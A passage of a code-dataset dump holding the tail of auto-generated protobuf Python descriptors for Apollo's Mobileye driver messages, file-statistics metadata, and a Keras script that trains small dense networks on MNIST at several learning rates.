options=None),
_descriptor.FieldDescriptor(
name='reseved_2', full_name='apollo.drivers.Details_739.reseved_2', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='obstacle_pos_y', full_name='apollo.drivers.Details_739.obstacle_pos_y', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='blinker_info', full_name='apollo.drivers.Details_739.blinker_info', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='cut_in_and_out', full_name='apollo.drivers.Details_739.cut_in_and_out', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='obstacle_rel_vel_x', full_name='apollo.drivers.Details_739.obstacle_rel_vel_x', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='obstacle_type', full_name='apollo.drivers.Details_739.obstacle_type', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reserved_3', full_name='apollo.drivers.Details_739.reserved_3', index=8,
number=9, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='obstacle_status', full_name='apollo.drivers.Details_739.obstacle_status', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='obstacle_brake_lights', full_name='apollo.drivers.Details_739.obstacle_brake_lights', index=10,
number=11, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reserved_4', full_name='apollo.drivers.Details_739.reserved_4', index=11,
number=12, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='obstacle_valid', full_name='apollo.drivers.Details_739.obstacle_valid', index=12,
number=13, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1836,
serialized_end=2154,
)
_DETAILS_73A = _descriptor.Descriptor(
name='Details_73a',
full_name='apollo.drivers.Details_73a',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='obstacle_length', full_name='apollo.drivers.Details_73a.obstacle_length', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='obstacle_width', full_name='apollo.drivers.Details_73a.obstacle_width', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='obstacle_age', full_name='apollo.drivers.Details_73a.obstacle_age', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='obstacle_lane', full_name='apollo.drivers.Details_73a.obstacle_lane', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='cipv_flag', full_name='apollo.drivers.Details_73a.cipv_flag', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reserved_5', full_name='apollo.drivers.Details_73a.reserved_5', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='radar_pos_x', full_name='apollo.drivers.Details_73a.radar_pos_x', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='radar_vel_x', full_name='apollo.drivers.Details_73a.radar_vel_x', index=7,
number=8, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='radar_match_confidence', full_name='apollo.drivers.Details_73a.radar_match_confidence', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reserved_6', full_name='apollo.drivers.Details_73a.reserved_6', index=9,
number=10, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='matched_radar_id', full_name='apollo.drivers.Details_73a.matched_radar_id', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reserved_7', full_name='apollo.drivers.Details_73a.reserved_7', index=11,
number=12, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2157,
serialized_end=2443,
)
_DETAILS_73B = _descriptor.Descriptor(
name='Details_73b',
full_name='apollo.drivers.Details_73b',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='obstacle_angle_rate', full_name='apollo.drivers.Details_73b.obstacle_angle_rate', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='obstacle_scale_change', full_name='apollo.drivers.Details_73b.obstacle_scale_change', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='object_accel_x', full_name='apollo.drivers.Details_73b.object_accel_x', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reserved_8', full_name='apollo.drivers.Details_73b.reserved_8', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='obstacle_replaced', full_name='apollo.drivers.Details_73b.obstacle_replaced', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reserved_9', full_name='apollo.drivers.Details_73b.reserved_9', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='obstacle_angle', full_name='apollo.drivers.Details_73b.obstacle_angle', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2446,
serialized_end=2634,
)
_MOBILEYE = _descriptor.Descriptor(
name='Mobileye',
full_name='apollo.drivers.Mobileye',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='header', full_name='apollo.drivers.Mobileye.header', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='aftermarket_669', full_name='apollo.drivers.Mobileye.aftermarket_669', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='details_737', full_name='apollo.drivers.Mobileye.details_737', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='details_738', full_name='apollo.drivers.Mobileye.details_738', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='details_739', full_name='apollo.drivers.Mobileye.details_739', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='details_73a', full_name='apollo.drivers.Mobileye.details_73a', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='details_73b', full_name='apollo.drivers.Mobileye.details_73b', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lka_766', full_name='apollo.drivers.Mobileye.lka_766', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lka_767', full_name='apollo.drivers.Mobileye.lka_767', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lka_768', full_name='apollo.drivers.Mobileye.lka_768', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lka_769', full_name='apollo.drivers.Mobileye.lka_769', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reference_76a', full_name='apollo.drivers.Mobileye.reference_76a', index=11,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='num_76b', full_name='apollo.drivers.Mobileye.num_76b', index=12,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='next_76c', full_name='apollo.drivers.Mobileye.next_76c', index=13,
number=14, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='next_76d', full_name='apollo.drivers.Mobileye.next_76d', index=14,
number=15, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2637,
serialized_end=3346,
)
_MOBILEYE.fields_by_name['header'].message_type = modules_dot_common_dot_proto_dot_header__pb2._HEADER
_MOBILEYE.fields_by_name['aftermarket_669'].message_type = _AFTERMARKET_669
_MOBILEYE.fields_by_name['details_737'].message_type = _DETAILS_737
_MOBILEYE.fields_by_name['details_738'].message_type = _DETAILS_738
_MOBILEYE.fields_by_name['details_739'].message_type = _DETAILS_739
_MOBILEYE.fields_by_name['details_73a'].message_type = _DETAILS_73A
_MOBILEYE.fields_by_name['details_73b'].message_type = _DETAILS_73B
_MOBILEYE.fields_by_name['lka_766'].message_type = _LKA_766
_MOBILEYE.fields_by_name['lka_767'].message_type = _LKA_767
_MOBILEYE.fields_by_name['lka_768'].message_type = _LKA_768
_MOBILEYE.fields_by_name['lka_769'].message_type = _LKA_769
_MOBILEYE.fields_by_name['reference_76a'].message_type = _REFERENCE_76A
_MOBILEYE.fields_by_name['num_76b'].message_type = _NUM_76B
_MOBILEYE.fields_by_name['next_76c'].message_type = _NEXT_76C
_MOBILEYE.fields_by_name['next_76d'].message_type = _NEXT_76D
DESCRIPTOR.message_types_by_name['Lka_768'] = _LKA_768
DESCRIPTOR.message_types_by_name['Num_76b'] = _NUM_76B
DESCRIPTOR.message_types_by_name['Aftermarket_669'] = _AFTERMARKET_669
DESCRIPTOR.message_types_by_name['Lka_769'] = _LKA_769
DESCRIPTOR.message_types_by_name['Reference_76a'] = _REFERENCE_76A
DESCRIPTOR.message_types_by_name['Details_738'] = _DETAILS_738
DESCRIPTOR.message_types_by_name['Next_76c'] = _NEXT_76C
DESCRIPTOR.message_types_by_name['Details_737'] = _DETAILS_737
DESCRIPTOR.message_types_by_name['Lka_767'] = _LKA_767
DESCRIPTOR.message_types_by_name['Lka_766'] = _LKA_766
DESCRIPTOR.message_types_by_name['Next_76d'] = _NEXT_76D
DESCRIPTOR.message_types_by_name['Details_739'] = _DETAILS_739
DESCRIPTOR.message_types_by_name['Details_73a'] = _DETAILS_73A
DESCRIPTOR.message_types_by_name['Details_73b'] = _DETAILS_73B
DESCRIPTOR.message_types_by_name['Mobileye'] = _MOBILEYE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Lka_768 = _reflection.GeneratedProtocolMessageType('Lka_768', (_message.Message,), dict(
DESCRIPTOR = _LKA_768,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Lka_768)
))
_sym_db.RegisterMessage(Lka_768)
Num_76b = _reflection.GeneratedProtocolMessageType('Num_76b', (_message.Message,), dict(
DESCRIPTOR = _NUM_76B,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Num_76b)
))
_sym_db.RegisterMessage(Num_76b)
Aftermarket_669 = _reflection.GeneratedProtocolMessageType('Aftermarket_669', (_message.Message,), dict(
DESCRIPTOR = _AFTERMARKET_669,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Aftermarket_669)
))
_sym_db.RegisterMessage(Aftermarket_669)
Lka_769 = _reflection.GeneratedProtocolMessageType('Lka_769', (_message.Message,), dict(
DESCRIPTOR = _LKA_769,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Lka_769)
))
_sym_db.RegisterMessage(Lka_769)
Reference_76a = _reflection.GeneratedProtocolMessageType('Reference_76a', (_message.Message,), dict(
DESCRIPTOR = _REFERENCE_76A,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Reference_76a)
))
_sym_db.RegisterMessage(Reference_76a)
Details_738 = _reflection.GeneratedProtocolMessageType('Details_738', (_message.Message,), dict(
DESCRIPTOR = _DETAILS_738,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Details_738)
))
_sym_db.RegisterMessage(Details_738)
Next_76c = _reflection.GeneratedProtocolMessageType('Next_76c', (_message.Message,), dict(
DESCRIPTOR = _NEXT_76C,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Next_76c)
))
_sym_db.RegisterMessage(Next_76c)
Details_737 = _reflection.GeneratedProtocolMessageType('Details_737', (_message.Message,), dict(
DESCRIPTOR = _DETAILS_737,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Details_737)
))
_sym_db.RegisterMessage(Details_737)
Lka_767 = _reflection.GeneratedProtocolMessageType('Lka_767', (_message.Message,), dict(
DESCRIPTOR = _LKA_767,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Lka_767)
))
_sym_db.RegisterMessage(Lka_767)
Lka_766 = _reflection.GeneratedProtocolMessageType('Lka_766', (_message.Message,), dict(
DESCRIPTOR = _LKA_766,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Lka_766)
))
_sym_db.RegisterMessage(Lka_766)
Next_76d = _reflection.GeneratedProtocolMessageType('Next_76d', (_message.Message,), dict(
DESCRIPTOR = _NEXT_76D,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Next_76d)
))
_sym_db.RegisterMessage(Next_76d)
Details_739 = _reflection.GeneratedProtocolMessageType('Details_739', (_message.Message,), dict(
DESCRIPTOR = _DETAILS_739,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Details_739)
))
_sym_db.RegisterMessage(Details_739)
Details_73a = _reflection.GeneratedProtocolMessageType('Details_73a', (_message.Message,), dict(
DESCRIPTOR = _DETAILS_73A,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Details_73a)
))
_sym_db.RegisterMessage(Details_73a)
Details_73b = _reflection.GeneratedProtocolMessageType('Details_73b', (_message.Message,), dict(
DESCRIPTOR = _DETAILS_73B,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Details_73b)
))
_sym_db.RegisterMessage(Details_73b)
Mobileye = _reflection.GeneratedProtocolMessageType('Mobileye', (_message.Message,), dict(
DESCRIPTOR = _MOBILEYE,
__module__ = 'modules.drivers.proto.mobileye_pb2'
# @@protoc_insertion_point(class_scope:apollo.drivers.Mobileye)
))
_sym_db.RegisterMessage(Mobileye)
# @@protoc_insertion_point(module_scope)
| 44.517241
| 6,056
| 0.738119
| 8,202
| 58,095
| 4.92258
| 0.041575
| 0.068954
| 0.055579
| 0.065536
| 0.852285
| 0.798786
| 0.758935
| 0.698724
| 0.676186
| 0.662464
| 0
| 0.065696
| 0.135364
| 58,095
| 1,304
| 6,057
| 44.55138
| 0.73809
| 0.019382
| 0
| 0.74288
| 1
| 0.000814
| 0.238125
| 0.203094
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005696
| 0
| 0.005696
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
06376772db28a435fbbc3171dbf0b49d52a7b209
| 10,275
|
py
|
Python
|
HW7_Submit/Q4.py
|
munir-bd/python-machine-learning-basic
|
b02fc22ce83895b7598bbc3aee9031684db2aa9f
|
[
"MIT"
] | null | null | null |
HW7_Submit/Q4.py
|
munir-bd/python-machine-learning-basic
|
b02fc22ce83895b7598bbc3aee9031684db2aa9f
|
[
"MIT"
] | null | null | null |
HW7_Submit/Q4.py
|
munir-bd/python-machine-learning-basic
|
b02fc22ce83895b7598bbc3aee9031684db2aa9f
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import tensorflow.contrib.keras as keras
import numpy as np
import matplotlib.pyplot as plt
# importing mnist dataset
from tensorflow.examples.tutorials.mnist import input_data
epochsNo = 300
mini_batch_size = 10
eta = 0.5
trainingSample = 3000
testingSample = 300
noOfNeuron = 40
mnist = input_data.read_data_sets("/tmp/data/", one_hot=False)
X_train = mnist.train.images[:trainingSample]
y_train = mnist.train.labels[:trainingSample]
X_test = mnist.test.images[:testingSample]
y_test = mnist.test.labels[:testingSample]
print(len(X_train))
print(len(X_test))
## mean centering and normalization:
mean_vals = np.mean(X_train, axis=0)
std_val = np.std(X_train)
X_train_centered = (X_train - mean_vals) / std_val
X_test_centered = (X_test - mean_vals) / std_val
del X_train, X_test
act_fn = ['relu', 'tanh', 'sigmoid']
color = ['b', 'r', 'g']
for ite in range(3):
y_train_onehot = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
units=40,
input_dim=X_train_centered.shape[1],
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
activation=act_fn[ite]))
model.add(
keras.layers.Dense(
units=40,
input_dim=40,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
activation=act_fn[ite]))
model.add(
keras.layers.Dense(
units=y_train_onehot.shape[1],
input_dim=40,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
activation=act_fn[ite]))
# declare the optimizer and cost function
sgd_optimizer = keras.optimizers.SGD(lr=eta)
model.compile(optimizer=sgd_optimizer, loss='categorical_crossentropy')
history = model.fit(X_train_centered, y_train_onehot,
batch_size=mini_batch_size, epochs=epochsNo,
verbose=0,
validation_split=0.1)
# checking accuracy on training and testing dataset
y_train_pred = model.predict_classes(X_train_centered, verbose=0)
correct_preds = np.sum(y_train == y_train_pred, axis=0)
train_acc = correct_preds / y_train.shape[0]
print('Training accuracy for eta = 0.5 %s is: %.2f%%' % (act_fn[ite], train_acc * 100))
y_test_pred = model.predict_classes(X_test_centered, verbose=0)
correct_preds = np.sum(y_test == y_test_pred, axis=0)
test_acc = correct_preds / y_test.shape[0]
print('Test accuracy for eta = 0.5 %s is: %.2f%%' % (act_fn[ite], test_acc * 100))
epochsNo = 3000
mini_batch_size = 10
eta = 1
trainingSample = 3000
testingSample = 300
noOfNeuron = 40
mnist = input_data.read_data_sets("/tmp/data/", one_hot=False)
X_train = mnist.train.images[:trainingSample]
y_train = mnist.train.labels[:trainingSample]
X_test = mnist.test.images[:testingSample]
y_test = mnist.test.labels[:testingSample]
print(len(X_train))
print(len(X_test))
## mean centering and normalization:
mean_vals = np.mean(X_train, axis=0)
std_val = np.std(X_train)
X_train_centered = (X_train - mean_vals) / std_val
X_test_centered = (X_test - mean_vals) / std_val
del X_train, X_test
act_fn = ['relu', 'tanh', 'sigmoid']
color = ['b', 'r', 'g']
for ite in range(3):
y_train_onehot = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
units=40,
input_dim=X_train_centered.shape[1],
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
activation=act_fn[ite]))
model.add(
keras.layers.Dense(
units=40,
input_dim=40,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
activation=act_fn[ite]))
model.add(
keras.layers.Dense(
units=y_train_onehot.shape[1],
input_dim=40,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
activation=act_fn[ite]))
# declare the optimizer and cost function
sgd_optimizer = keras.optimizers.SGD(lr=eta)
model.compile(optimizer=sgd_optimizer, loss='categorical_crossentropy')
history = model.fit(X_train_centered, y_train_onehot,
batch_size=mini_batch_size, epochs=epochsNo,
verbose=0,
validation_split=0.1)
# checking accuracy on training and testing dataset
y_train_pred = model.predict_classes(X_train_centered, verbose=0)
correct_preds = np.sum(y_train == y_train_pred, axis=0)
train_acc = correct_preds / y_train.shape[0]
print('Training accuracy for eta = 1 %s is: %.2f%%' % (act_fn[ite], train_acc * 100))
y_test_pred = model.predict_classes(X_test_centered, verbose=0)
correct_preds = np.sum(y_test == y_test_pred, axis=0)
test_acc = correct_preds / y_test.shape[0]
print('Test accuracy for eta = 1 %s is: %.2f%%' % (act_fn[ite], test_acc * 100))
epochsNo = 300
mini_batch_size = 10
eta = 0.25
trainingSample = 3000
testingSample = 300
noOfNeuron = 40
mnist = input_data.read_data_sets("/tmp/data/", one_hot=False)
X_train = mnist.train.images[:trainingSample]
y_train = mnist.train.labels[:trainingSample]
X_test = mnist.test.images[:testingSample]
y_test = mnist.test.labels[:testingSample]
print(len(X_train))
print(len(X_test))
## mean centering and normalization:
mean_vals = np.mean(X_train, axis=0)
std_val = np.std(X_train)
X_train_centered = (X_train - mean_vals) / std_val
X_test_centered = (X_test - mean_vals) / std_val
del X_train, X_test
act_fn = ['relu', 'tanh', 'sigmoid']
color = ['b', 'r', 'g']
for ite in range(3):
y_train_onehot = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
units=40,
input_dim=X_train_centered.shape[1],
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
activation=act_fn[ite]))
model.add(
keras.layers.Dense(
units=40,
input_dim=40,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
activation=act_fn[ite]))
model.add(
keras.layers.Dense(
units=y_train_onehot.shape[1],
input_dim=40,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
activation=act_fn[ite]))
# declare the optimizer and cost function
sgd_optimizer = keras.optimizers.SGD(lr=eta)
model.compile(optimizer=sgd_optimizer, loss='categorical_crossentropy')
history = model.fit(X_train_centered, y_train_onehot,
batch_size=mini_batch_size, epochs=epochsNo,
verbose=0,
validation_split=0.1)
# checking accuracy on training and testing dataset
y_train_pred = model.predict_classes(X_train_centered, verbose=0)
correct_preds = np.sum(y_train == y_train_pred, axis=0)
train_acc = correct_preds / y_train.shape[0]
print('Training accuracy for eta = 0.25 %s is: %.2f%%' % (act_fn[ite], train_acc * 100))
y_test_pred = model.predict_classes(X_test_centered, verbose=0)
correct_preds = np.sum(y_test == y_test_pred, axis=0)
test_acc = correct_preds / y_test.shape[0]
print('Test accuracy for eta = 0.25 %s is: %.2f%%' % (act_fn[ite], test_acc * 100))
epochsNo = 300
mini_batch_size = 10
eta = 1.5
trainingSample = 3000
testingSample = 300
noOfNeuron = 40
mnist = input_data.read_data_sets("/tmp/data/", one_hot=False)
X_train = mnist.train.images[:trainingSample]
y_train = mnist.train.labels[:trainingSample]
X_test = mnist.test.images[:testingSample]
y_test = mnist.test.labels[:testingSample]
print(len(X_train))
print(len(X_test))
## mean centering and normalization:
mean_vals = np.mean(X_train, axis=0)
std_val = np.std(X_train)
X_train_centered = (X_train - mean_vals) / std_val
X_test_centered = (X_test - mean_vals) / std_val
del X_train, X_test
act_fn = ['relu', 'tanh', 'sigmoid']
color = ['b', 'r', 'g']
for ite in range(3):
y_train_onehot = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
units=40,
input_dim=X_train_centered.shape[1],
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
activation=act_fn[ite]))
model.add(
keras.layers.Dense(
units=40,
input_dim=40,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
activation=act_fn[ite]))
model.add(
keras.layers.Dense(
units=y_train_onehot.shape[1],
input_dim=40,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
activation=act_fn[ite]))
# declare the optimizer and cost function
sgd_optimizer = keras.optimizers.SGD(lr=eta)
model.compile(optimizer=sgd_optimizer, loss='categorical_crossentropy')
history = model.fit(X_train_centered, y_train_onehot,
batch_size=mini_batch_size, epochs=epochsNo,
verbose=0,
validation_split=0.1)
# checking accuracy on training and testing dataset
y_train_pred = model.predict_classes(X_train_centered, verbose=0)
correct_preds = np.sum(y_train == y_train_pred, axis=0)
train_acc = correct_preds / y_train.shape[0]
print('Training accuracy for eta = 1.5 %s is: %.2f%%' % (act_fn[ite], train_acc * 100))
y_test_pred = model.predict_classes(X_test_centered, verbose=0)
correct_preds = np.sum(y_test == y_test_pred, axis=0)
test_acc = correct_preds / y_test.shape[0]
print('Test accuracy for eta = 1.5 %s is: %.2f%%' % (act_fn[ite], test_acc * 100))
| 35.431034
| 94
| 0.643017
| 1,383
| 10,275
| 4.513377
| 0.091106
| 0.038449
| 0.025633
| 0.036527
| 0.971964
| 0.971964
| 0.96876
| 0.96876
| 0.963794
| 0.963794
| 0
| 0.02539
| 0.244866
| 10,275
| 290
| 95
| 35.431034
| 0.779095
| 0.050511
| 0
| 0.924051
| 0
| 0
| 0.082751
| 0.010159
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021097
| 0
| 0.021097
| 0.067511
